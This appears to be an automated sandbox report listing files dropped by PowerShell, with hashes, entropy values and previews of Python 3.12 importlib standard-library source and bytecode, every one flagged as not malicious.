                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):501
                                                                                                    Entropy (8bit):5.360310933194613
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:h9fSBdsrUEyqw1zNxQj4gwKJO0UnqI5ChB3aghpPT0q/:hB6s4Eyqw1zNxsCKJO4Fhogh5Y6
                                                                                                    MD5:A4A4F16BD609D77FF460B5E4FC470D64
                                                                                                    SHA1:B38AFAB2CAB539EA63B31C45769A51490C32007C
                                                                                                    SHA-256:5F6FFD4A198B8F8D970E97CBF7C13E7525BE538B81AE2B0CB0C8397030ACEC56
                                                                                                    SHA-512:A6FBF256719F22543D9A06181CAEB4BB06991C1330F8B5BBDB6DEF555C1F5E65ED555F6A7D1BDED8D972478D4A82C9041D5C83512EBAD14A9DCEBE472948A1D9
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fS.........................(.....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.y.).z..Compatibility shim for .resources.readers as found on Python 3.10...Consumers that can rely on Python 3.11 should use the other.module directly.......)...FileReader..ZipReader..MultiplexedPath..NamespaceReaderN)...__doc__..resources.readersr....r....r....r......__all__........OC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\readers.py..<module>r........s............................L...r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1393
                                                                                                    Entropy (8bit):4.427551858910038
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:7+SdXp8ImdaCtl27fisRiqITfqF6BSES5C+LOqqc9:CSK07fisQqgqF2SEqxz
                                                                                                    MD5:B9344DFD73AFA9269F1701F6959D7A94
                                                                                                    SHA1:B4945D7DE3B00D0761760B6131D9F7D3A95411D6
                                                                                                    SHA-256:795157B91862D662AE681C0521DAA1311B34B763B955E01505A27C865D848EAE
                                                                                                    SHA-512:7A994E456BEC98C52A2130898FDE1F5148A5919F17F814CA4357BF7B9C48C100930D0519F2A8BE5D4ED37D17C0C7AB0A8F571BB71EF01613E8ED24B715A4F1CB
                                                                                                    Malicious:false
                                                                                                    Preview:"""Subset of importlib.abc used to reduce importlib.util imports."""..from . import _bootstrap..import abc......class Loader(metaclass=abc.ABCMeta):.... """Abstract base class for import loaders.""".... def create_module(self, spec):.. """Return a module to initialize and into which to load..... This method should raise ImportError if anything prevents it.. from creating a new module. It may return None to indicate.. that the spec should create the new module... """.. # By default, defer to default semantics for the new module... return None.... # We don't define exec_module() here since that would break.. # hasattr checks we do to support backward compatibility..... def load_module(self, fullname):.. """Return the loaded module..... The module must be added to sys.modules and have import-related.. attributes set properly. The fullname is a str..... ImportError is raised on failure.....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):58607
                                                                                                    Entropy (8bit):4.432175502845617
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:18AwHfgLuEbK7qyz4yBZIFUxn3vkuFlszRJ1l89GRO0sdB4miJ55v:u3IuEbwq5vUh3vku+SYv
                                                                                                    MD5:683A9FFC2665B44EAB0DC6CD7FEAE818
                                                                                                    SHA1:44E1896F51986A655FF3B791BCD09B3AEEC7C707
                                                                                                    SHA-256:74A7017D6CCF9AAB6A6140771DB1E83118449331DFDB3AFA87A1C06A372C4F05
                                                                                                    SHA-512:FCD09112256AE27ADB4322512173A65D827DAA69EF844FDC4A9DCB85195F685AA22DCEE7DAB6CDD1C80AD2D46F937D1D6130B1C3DC66C8EFEF64C32E7052FE0F
                                                                                                    Malicious:false
                                                                                                    Preview:"""Core implementation of import.....This module is NOT meant to be directly imported! It has been designed such..that it can be bootstrapped into Python as the implementation of import. As..such it requires the injection of specific modules and attributes in order to..work. One should use importlib as the public-facing version of this module....."""..#..# IMPORTANT: Whenever making changes to this module, be sure to run a top-level..# `make regen-importlib` followed by `make` in order to get the frozen version..# of the module updated. Not doing so will result in the Makefile to fail for..# all others who don't have a ./python around to freeze the module..# in the early stages of compilation...#....# See importlib._setup() for what is injected into the global namespace.....# When editing this code be aware that code executed at import time CANNOT..# reference any injected objects! This includes not only global code but also..# anything specified at the class level.....def _object_name
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):70920
                                                                                                    Entropy (8bit):4.782756894999464
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:iKsoAmFfyJ4QFhE/tn5ePIJ0feP1tI4qOuMCxl6knccZ/76UlgMvflotc9:txQ4QF8tn5eP8C4q6kccZzZveq
                                                                                                    MD5:31949D8E3054036EFFF8B3AEE9DF79BA
                                                                                                    SHA1:1A170A0F5875DF05AE22F3AFD90353B03BA9232C
                                                                                                    SHA-256:A4644D1472529A8F2BDF039CC211630CC4B37CD293F8AE13FD8D974D37E6DC57
                                                                                                    SHA-512:6338A2770939DF8CD4AA8A614868DE89F93D18E53AD7900D6AE043F389BB8C1473083CA75FB99C1592A92CFC62E453B4837C023BF4D578E2003C681BCC03522C
                                                                                                    Malicious:false
                                                                                                    Preview:"""Core implementation of path-based import.....This module is NOT meant to be directly imported! It has been designed such..that it can be bootstrapped into Python as the implementation of import. As..such it requires the injection of specific modules and attributes in order to..work. One should use importlib as the public-facing version of this module....."""..# IMPORTANT: Whenever making changes to this module, be sure to run a top-level..# `make regen-importlib` followed by `make` in order to get the frozen version..# of the module updated. Not doing so will result in the Makefile to fail for..# all others who don't have a ./python around to freeze the module in the early..# stages of compilation...#....# See importlib._setup() for what is injected into the global namespace.....# When editing this code be aware that code executed at import time CANNOT..# reference any injected objects! This includes not only global code but also..# anything specified at the class level.....# Module
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7851
                                                                                                    Entropy (8bit):4.615080798654411
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:+E1GL85updL/sl7/piIJYkYuHImwTh2M5XyEZUM5wnEeAA/h/8M8HMDx5D2dhl9G:0L/+/YIBIjyyroF8c1470fY7GTDHf
                                                                                                    MD5:24BD6DA498D8D1962F931980E80996DC
                                                                                                    SHA1:6B1B13F61A258C19EB7FDDE5581026ABBBCBB084
                                                                                                    SHA-256:E968730B743A235C1D4D245563DD2257FE1D3CE4FAA22AEA0274680B3B2BDE97
                                                                                                    SHA-512:7CC1DB4172573961AA445319E3D3FE3B1141CA51441AB65C0CFEB2FA5100B0F3D8D25EE9AB8F22518A527CF38FC02C876AA671844920CCA2C3D458EBE382A86E
                                                                                                    Malicious:false
                                                                                                    Preview:"""Abstract base classes related to import."""..from . import _bootstrap_external..from . import machinery..try:.. import _frozen_importlib..except ImportError as exc:.. if exc.name != '_frozen_importlib':.. raise.. _frozen_importlib = None..try:.. import _frozen_importlib_external..except ImportError:.. _frozen_importlib_external = _bootstrap_external..from ._abc import Loader..import abc..import warnings....from .resources import abc as _resources_abc......__all__ = [.. 'Loader', 'MetaPathFinder', 'PathEntryFinder',.. 'ResourceLoader', 'InspectLoader', 'ExecutionLoader',.. 'FileLoader', 'SourceLoader',..]......def __getattr__(name):.. """.. For backwards compatibility, continue to make names.. from _resources_abc available through this module. #93963.. """.. if name in _resources_abc.__all__:.. obj = getattr(_resources_abc, name).. warnings._deprecated(f"{__name__}.{name}", remove=(3, 14)).. globals()[name] = obj..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):900
                                                                                                    Entropy (8bit):4.955279656424343
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:YT166asGSaopamPQpaJ2XEaJ2QaJLYaJRaJnaJiaJeMaJ2h5Jir:2VGSD0y20y2QyLYyRynyiyfy2h5Jir
                                                                                                    MD5:2492D118AAA72971157EC93AD1919FCB
                                                                                                    SHA1:6A48065FDA49FE587D255CACF31EFDAFC09F8AE8
                                                                                                    SHA-256:9A2EE437C38E45CDF7559F613F57209B5B11C0824A9069192B9EBD5A2CEEFA1A
                                                                                                    SHA-512:DDCB67E4DDE35064CF851B6C7F4D9B58123CE01D75FE20369B189BC52123AAB8B3ECD53F40A9D50875A360992AD453239C5BAFA5DC17C3C41A0EDD20D7E7DD4F
                                                                                                    Malicious:false
                                                                                                    Preview:"""The machinery of importlib: finders, loaders, hooks, etc."""....from ._bootstrap import ModuleSpec..from ._bootstrap import BuiltinImporter..from ._bootstrap import FrozenImporter..from ._bootstrap_external import (SOURCE_SUFFIXES, DEBUG_BYTECODE_SUFFIXES,.. OPTIMIZED_BYTECODE_SUFFIXES, BYTECODE_SUFFIXES,.. EXTENSION_SUFFIXES)..from ._bootstrap_external import WindowsRegistryFinder..from ._bootstrap_external import PathFinder..from ._bootstrap_external import FileFinder..from ._bootstrap_external import SourceFileLoader..from ._bootstrap_external import SourcelessFileLoader..from ._bootstrap_external import ExtensionFileLoader..from ._bootstrap_external import NamespaceLoader......def all_suffixes():.. """Returns a list of all recognized module suffixes for this process""".. return SOURCE_SUFFIXES + BYTECODE_SUFFIXES + EXTENSION_SUFFIXES..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29709
                                                                                                    Entropy (8bit):4.587258080464864
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:LAYSytaMmMXy0Tgx3/eEXeb1S5OeGZIMVopvE85tQTsaTC2SWTtdB7GFQ6+hwRgG:LPSgmMXy4gxNOlVavENfhNSCwnaq
                                                                                                    MD5:30110FEE47A4E4F3874FE2C46CDDC3B9
                                                                                                    SHA1:CA4925F316C4DE2C05B5D7C98C2F33445BD711BE
                                                                                                    SHA-256:9798E43428F6C11BF9C4602BE62599FF2470088FE0BF82C8BBBC177E740E1F08
                                                                                                    SHA-512:965DBC96E891397CCA995CF15B1150E2BDAB73B4BC8F9B05B3D9B56F31F44750D04F2449688ED5A76B283496906129F27F43C8281D55AF95CA94D7FDC6D8BE42
                                                                                                    Malicious:false
                                                                                                    Preview:import os..import re..import abc..import csv..import sys..import email..import pathlib..import zipfile..import operator..import textwrap..import warnings..import functools..import itertools..import posixpath..import contextlib..import collections..import inspect....from . import _adapters, _meta..from ._collections import FreezableDefaultDict, Pair..from ._functools import method_cache, pass_none..from ._itertools import always_iterable, unique_everseen..from ._meta import PackageMetadata, SimplePath....from contextlib import suppress..from importlib import import_module..from importlib.abc import MetaPathFinder..from itertools import starmap..from typing import List, Mapping, Optional, cast......__all__ = [.. 'Distribution',.. 'DistributionFinder',.. 'PackageMetadata',.. 'PackageNotFoundError',.. 'distribution',.. 'distributions',.. 'entry_points',.. 'files',.. 'metadata',.. 'packages_distributions',.. 'requires',.. 'version',..]......class PackageN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):48523
                                                                                                    Entropy (8bit):5.171535604541654
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:M+Md9mVMXBPqh1fpSjme5nfrKYBgHATlZuDJnw/VdfZLl:M+i9mMqhajmwnfXB8AwJw/VrLl
                                                                                                    MD5:914E88155789623AC240D9BAB20259CC
                                                                                                    SHA1:B1775AB0CA4FBCB4D61B8E1B598E01A7448E3BA6
                                                                                                    SHA-256:BD460FE55D2B53C03A01A52EC0A7B8C5FC66E3634934C62CB1CB3AF6AC1B45D4
                                                                                                    SHA-512:62D5513DCAA978A8ACA6EFA92856F0C4E7D87F9E596D09EDA1C6BC7AB9388E6C5F90E6FC3AF13DF273CEEFA4AB1538A1476CD08AAD85558ED2FC212AFBE34839
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f.t........................8.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l.m$Z$..d.d.l%m&Z&m'Z'm(Z(m)Z)..g.d...Z*..G.d...d.e+........Z,..G.d...d.........Z-..G.d...d.........Z...G.d...d.e.........Z/..G.d...d.e0........Z1..G.d...d.e.jd..........................Z3..G.d...d.........Z4..G.d...d.........Z5..G.d...d.e5........Z6..G.d ..d!e#........Z7..G.d"..d#........Z8..G.d$..d%........Z9..G.d&..d'........Z:..G.d(..d)e7........Z;..G.d*..d+e6........Z<d,..Z=d-..Z>d.e.j:..................f.d/..Z?d0..Z@..e.j...................e...e.j...................d1.........2........ZC..d.e1f.d3..ZDd4..ZEd5..ZFd.e'eGe&eG....f.....f.d6..ZHd7..ZId8..ZJy.)9.....N.....)..._adapters.._meta)...FreezableDefaultDict..Pair)...method_cache..pass_none)...always_iterable..unique_everseen)...Pack
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3874
                                                                                                    Entropy (8bit):5.295164621411875
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:FZ6XRGKwmIXs8SAByPMOCkXMQjKRUlt8xwEXd15IB8NtZ2Ct3GN:HKMsUsMHRUl6zP+B8N7HI
                                                                                                    MD5:961C57433A0885E8552D0AB63BB27FFD
                                                                                                    SHA1:E829656D26CD286088ECB88F2429841921167A6B
                                                                                                    SHA-256:BDE57CE938E54928AE242335DFAA7AB16FA95A45862B1B9FC02957BF3DA8CBD7
                                                                                                    SHA-512:E8E4A1FCF807D885619A983E5B2AE2C796EFB361FF7F1B665320699BEE46CC8E3A1F9C40676E431FBC8F402BBD50C3D216D5B81082BCBD5BF2A336447930ED6F
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....e.j...................e.j...................d.e.d...........Z...G.d...d.e.j...................j...........................Z.y.)......N.....)...FoldedCasezFImplicit None on return values is deprecated and will raise KeyErrors......)...stacklevelc............................e.Z.d.Z...e...e.e.g.d...................Z...d.e.j...................j...................f...f.d...Z.d...Z...f.d...Z...f.d...Z.d...Z.e.d...........Z...x.Z.S.)...Message)...Classifierz.Obsoletes-Dist..Platformz.Project-URLz.Provides-Distz.Provides-Extraz.Requires-Distz.Requires-Externalz.Supported-Platform..Dynamic..origc.....................l.......t...........|.....|.........}.t.........|.........j...................t.........|...................|.S...N)...super..__new__..vars..update)...clsr......res..__class__s.... ..ZC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\metadata\_adapters.pyr....z.Mes
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1922
                                                                                                    Entropy (8bit):5.148390936025754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:hKqCflLM8ZOSIJxBgP3d7IjiBkXnpflW9l05BMtRKq6G1DR2Nu2I4l/dqJp3Y:4Xl4KOSIV6KjiqOlcBMHKgR2I2Hl+p3Y
                                                                                                    MD5:C4A8205FA3A92E78D0F8DE07AB30D685
                                                                                                    SHA1:368D13DE2ABBB85B11227E47D998C460C19E90FA
                                                                                                    SHA-256:A34EB1866E9E8AD2C0C6C5E76964730B64A6516C7FDA1A2A54AE345B5A04ACB2
                                                                                                    SHA-512:6EC107C7520D9091900F1AB7012EC6C4ADCC0C7B38B2EA2188C9E541D517907C0C01EA1923A84475361638DAF66108B1309C2D123C758512E8D83E286FCEAF1C
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f..........................n.....d.d.l.Z...G.d...d.e.j...........................Z...G.d...d...e.j...................d.d.................Z.y.)......Nc.....................(.......e.Z.d.Z.d.Z...f.d...Z.d...Z...x.Z.S.)...FreezableDefaultDicta!.... Often it is desirable to prevent the mutation of. a default dict after its initial construction, such. as to prevent mutation during iteration... >>> dd = FreezableDefaultDict(list). >>> dd[0].append('1'). >>> dd.freeze(). >>> dd[1]. []. >>> len(dd). 1. c.....................:.........t.........|.d.t...........|.............|.........S.).N.._frozen)...getattr..super..__missing__)...self..key..__class__s.... ..]C:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\metadata\_collections.pyr....z FreezableDefaultDict.__missing__....s.........<.w.t.Y.....(;..<.S..A..A.....c...............................f.d....._.........y.).Nc.....................$.........j...........................S.).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3480
                                                                                                    Entropy (8bit):5.283562690673815
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:7fbuTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0le/y3:7GoOCDUX4sXwjvMXNpa6kIO5pL
                                                                                                    MD5:B1ABF6B6C6255E1DE4D16BACFD1C525F
                                                                                                    SHA1:A485935A138C3EBA4C745CD1BC2EEE868CD29779
                                                                                                    SHA-256:BAFB0A7927DBC2D3E0C9950C75258561AE5B0F810C06CF9A2AB9BC1C3056D060
                                                                                                    SHA-512:6B5D09013C440C75777A4428E7FD5458DF3C9C8921F8D7D5C0E0AD195EB13444A307F1AD6DFB46AECE3CC1905E5DA81529088501078C4D823C98543D1C48A09F
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f..........................".....d.d.l.Z.d.d.l.Z.d.d...Z.d...Z.y.)......Nc.....................V...........x.s...t.........j.................................f.d...}.d...|._.........|.S.).aV.... Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the ca
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2404
                                                                                                    Entropy (8bit):5.4991645924323835
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:J+N3JjfPMrnZ48AVCkCzOQVQqtXBcNqo+UoJyE5fp:kN5j848lhBnY+UhE5R
                                                                                                    MD5:EC526EC6861F6B32D20B865F2DA340A0
                                                                                                    SHA1:EAAB7F9F6647E3C9C679B6FCE4371D02F5F42A9B
                                                                                                    SHA-256:380818D012D5D9D9590F3DFD6D1BD67E611F203C9C9F18481DCF39DEDCDAC890
                                                                                                    SHA-512:DA6ABDB3E8500CF8D5917E7DC3FE767933DBCEDDAB2FE4BACE8BB217CC7E446548B03A5D15C31534417F3976FC75FB1666DE6448BD7CA6D652979382BBABDA13
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f].........................&.....d.d.l.m.Z...d.d...Z.e.e.f.f.d...Z.y.)......)...filterfalseNc................#........K.....t.................}.|.j...................}.|..(t.........|.j...................|.........D.]...}...|.|...........|...........y.|.D.]...}...|.|.........}.|.|.v.s.....|.|...........|...........y...w.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__)...iterable..key..seen..seen_add..element..ks.... .[C:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\metadata\_itertools.py..unique_everseenr........ss..............5.D....x.x.H....{..".4.#4.#4.h..?......G....W.......M......... ......G....G...A......}..................s.....A.A$....A$.c..........................|...t.........d.........S.|...t.........|.|.........r.t.........|.f.........S...t.........|.........S.#.t.........$.r...t.........|.f.........c.Y.S.w.x.Y.w.).ax...If *obj* is iterable, return an iterator over its items:
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3320
                                                                                                    Entropy (8bit):5.012057236879988
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:o1IxqYyQ83oZ47j5wGe4fFYdlqrTI8YtWtXBjJH:o1ITyQ83oZ47j5wN4fFYdlq3DYtWtRlH
                                                                                                    MD5:A122A60EC73A3311305BB88927E19432
                                                                                                    SHA1:105035640320D9DAE206F69890FD61608FD61C8F
                                                                                                    SHA-256:B00DD4B9B1D320CFB0CF824E6FBEFACA64931F2F952C55DB5646DD098CF04AD2
                                                                                                    SHA-512:FDC5954D695F8E7662D67FEE93F216A66326D9AB5CCB4CF9F79981D88CAF2C92B30750511A0379C4671B4089335111C05D93F539C9C86A834DC7B940EA98FDE5
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fu.........................z.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.........Z...G.d...d.e.........Z...G.d...d.e.e.............Z.y.)......)...Protocol)...Any..Dict..Iterator..List..Optional..TypeVar..Union..overload.._Tc.....................".....e.Z.d.Z.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.e.....f.d...Z.e.d.d.e.d.d.d.e.e.....f.d...........Z.e.d.e.d.e.d.e.e.e.f.....f.d...........Z.e.d.d.e.d.d.d.e.e.e.........f.d...........Z.e.d.e.d.e.d.e.e.e.....e.f.....f.d...........Z.e.d.e.e.e.e.e.e.....f.....f.....f.d...........Z.y.)...PackageMetadata..returnc...........................y...N......selfs.... .VC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\metadata\_meta.py..__len__z.PackageMetadata.__len__.....................itemc...........................y.r....r....).r....r....s.... r......__contains__z.PackageMetadata.__contains__....r....r......keyc...........................y.r....r....).r....r....s.... r......__getitem__z.Pac
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3881
                                                                                                    Entropy (8bit):5.00437204602975
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zzrbGowYRzHinOrIAeQc2jrAYWdDMWwAk+S3MOjRM:mowCmVAeQvAYWdPwFnK
                                                                                                    MD5:16B5556291FAACEED52C2A92CFA41624
                                                                                                    SHA1:D77F01D77FE2CC2414D0C1371AFDF945DCCB337B
                                                                                                    SHA-256:3C9EB32943A249847C8B85D061F48F705C34270ADD45AFADCC3E54F7D55CAA76
                                                                                                    SHA-512:7147DECF092A9B4C3EC560186DA47E3F34CF0A6ED33B995B96B6B6FC712E44B7FDF3DA29E6CA3F7D5F8446966A44D944E99559D01753E8676D90510D5ADA5EC8
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f................................d.d.l.Z.d.d.l.m.Z.....G.d...d.e.........Z.y.)......N.....)...method_cachec.....................h.......e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z...f.d...Z.d...Z.e...f.d...........Z.d...Z.d.d...Z...x.Z.S.)...FoldedCasea{.... A case insensitive string class; behaves just like str. except compares equal when the only variation is case... >>> s = FoldedCase('hello world').. >>> s == 'Hello World'. True.. >>> 'Hello World' == s. True.. >>> s != 'Hello World'. False.. >>> s.index('O'). 4.. >>> s.split('O'). ['hell', ' w', 'rld'].. >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])). ['alpha', 'Beta', 'GAMMA'].. Sequence membership is straightforward... >>> "Hello World" in [s]. True. >>> s in ["Hello World"]. True.. You may test for set inclusion, but candidate and elements. must both be folded... >>> FoldedCase("Hello World") in {s}. True. >>> s in {FoldedCase("Hello Wo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2495
                                                                                                    Entropy (8bit):4.4481790370885905
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:gIwGFG9kX+5jVN5+LjtoIKEuFKRw5oGpEnFSy1lkVsqG31WCkG:gBmG9FjX5+uG1Fnl8SWCkG
                                                                                                    MD5:C91BB638CA8D00BD6E43AEBD2E63E401
                                                                                                    SHA1:A2966028FF90685B01AA61332A7E65035F5AE0A9
                                                                                                    SHA-256:C42DEC9F9FBB2FC493DA2E0599158A67C8D3DFA7B6D69955AAA1BA9ED589A6BA
                                                                                                    SHA-512:B6AF727E94564D5066B635E87F1157A9B920B058554890A47E81304051C4EFE6CF3CB88745EF4875536FE09BB816E5BAC17F57C81C9008C0039F16A28D7835E5
                                                                                                    Malicious:false
                                                                                                    Preview:import functools..import warnings..import re..import textwrap..import email.message....from ._text import FoldedCase......# Do not remove prior to 2024-01-01 or Python 3.14.._warn = functools.partial(.. warnings.warn,.. "Implicit None on return values is deprecated and will raise KeyErrors.",.. DeprecationWarning,.. stacklevel=2,..)......class Message(email.message.Message):.. multiple_use_keys = set(.. map(.. FoldedCase,.. [.. 'Classifier',.. 'Obsoletes-Dist',.. 'Platform',.. 'Project-URL',.. 'Provides-Dist',.. 'Provides-Extra',.. 'Requires-Dist',.. 'Requires-External',.. 'Supported-Platform',.. 'Dynamic',.. ],.. ).. ).. """.. Keys that may be indicated multiple times per PEP 566... """.... def __new__(cls, orig: email.message.Message):.. res = super().__
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):773
                                                                                                    Entropy (8bit):4.707400693185867
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:ysSCg72MrelLMEdrqbM1Mgd5aWqp/IV/MZhmuyNSKtVYCy:ytYlLMZ3y5aWowVEZ8m
                                                                                                    MD5:0E214D282C8470C634BBA8872B3DC139
                                                                                                    SHA1:98850B764D8FD22830CB9014E2528FE5FE36C315
                                                                                                    SHA-256:4281B8DA21C38B837C93E93916D6BBC0A01F7E023C7D39251E3B80250F7D575E
                                                                                                    SHA-512:9F024100BFCEA2ABCD2587C97CE0E35B7BF485A972C879883DA99E8F1A4A5931F9A9A2963354AF2389CB46314F1EBF43C09DCC5E30D25790E1470EC6E9539B01
                                                                                                    Malicious:false
                                                                                                    Preview:import collections......# from jaraco.collections 3.3..class FreezableDefaultDict(collections.defaultdict):.. """.. Often it is desirable to prevent the mutation of.. a default dict after its initial construction, such.. as to prevent mutation during iteration..... >>> dd = FreezableDefaultDict(list).. >>> dd[0].append('1').. >>> dd.freeze().. >>> dd[1].. [].. >>> len(dd).. 1.. """.... def __missing__(self, key):.. return getattr(self, '_frozen', super().__missing__)(key).... def freeze(self):.. self._frozen = lambda key: self.default_factory()......class Pair(collections.namedtuple('Pair', 'name value')):.. @classmethod.. def parse(cls, text):.. return cls(*map(str.strip, text.split("=", 1)))..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2999
                                                                                                    Entropy (8bit):4.6344062686720875
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:b8buTGBskHc4SpcJ1lGRGX5GEGuvSpQIgQyAdGnlfsJdSpzTKjJkmSphBlle/RlV:bgst6XJyQIT4bhU5I4NrM3IT4W
                                                                                                    MD5:656CF285C9D4FAE91F3F4B02851338D5
                                                                                                    SHA1:4F4293F48C7C74C7B0EC949AF3CC526C4F59084B
                                                                                                    SHA-256:DA7408563C04CAD511DAEBF9E2A1091AD148DEF11A388437D05B97A5618B881D
                                                                                                    SHA-512:453138A2FA3974AD3614842CE0948C439167513ACB18243E76C37449AAB71693600966A014690A0FCB0C246A01D0AFE10CFC269C44C904FF37F88DE197508CB3
                                                                                                    Malicious:false
                                                                                                    Preview:import types..import functools......# from jaraco.functools 3.3..def method_cache(method, cache_wrapper=None):.. """.. Wrap lru_cache to support storing the cache data in the object instances..... Abstracts the common paradigm where the method explicitly saves an.. underscore-prefixed protected property on first call and returns that.. subsequently..... >>> class MyClass:.. ... calls = 0.. ..... ... @method_cache.. ... def method(self, value):.. ... self.calls += 1.. ... return value.... >>> a = MyClass().. >>> a.method(3).. 3.. >>> for x in range(75):.. ... res = a.method(x).. >>> a.calls.. 75.... Note that the apparent behavior will be exactly like that of lru_cache.. except that the cache is stored on each instance, so values in one.. instance will not flush values from another, and when an instance is.. deleted, so are the cached values for that instance..... >>> b = MyClass()..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2141
                                                                                                    Entropy (8bit):4.53241011385655
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Hu9gJjTxeR2Xz+u+0zOi/IRq7Xl/QlhNo+9+Xlh9B:yEjg2/nKceq+9A
